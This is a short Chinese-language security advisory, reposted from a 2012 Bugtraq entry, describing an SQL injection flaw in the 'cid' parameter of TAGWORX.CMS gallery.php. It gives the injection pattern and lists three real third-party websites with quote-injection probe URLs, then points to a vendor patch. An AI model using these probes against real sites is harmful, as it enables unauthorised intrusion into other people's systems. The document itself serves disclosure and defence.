TAGWORX.CMS “cid” SQL注入漏洞

文章由LinuxBoy分享于2019-04-02 06:04:11热评（158）

发布日期：2012-09-18
更新日期：2012-09-20

受影响系统：
TAGWORX.CMS TAGWORX.CMS
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 55570

TAGWORX.CMS是内容管理系统。

TAGWORX.CMS内提供"cid"参数传递到gallery.php (设置了"pid") 的输入没有正确过滤即用在SQL查询中，通过注入任意SQL代码可操作SQL查询。

<*来源：Crim3R

链接：http://secunia.com/advisories/50543/
http://packetstormsecurity.org/files/116370/TAGWORX.CMS-SQL-Injection.html
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

==================================
sqli
[+] gallery.php?cid=[id][sqli]&pid=[id]

D3m0:

http://www.dr-schratzlseer.de/gallery.php?cid=124'&pid=124

http://www.weingut-muenchen.de/gallery.php?cat_id=17&cid='&pid=&img=1

http://www.lebenstanz.com/gallery.php?cid=124'&pid=124

===============Crim3R@Att.Net=========

建议：
--------------------------------------------------------------------------------
厂商补丁：

TAGWORX.CMS
-----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.tagworx.net/

推荐文章：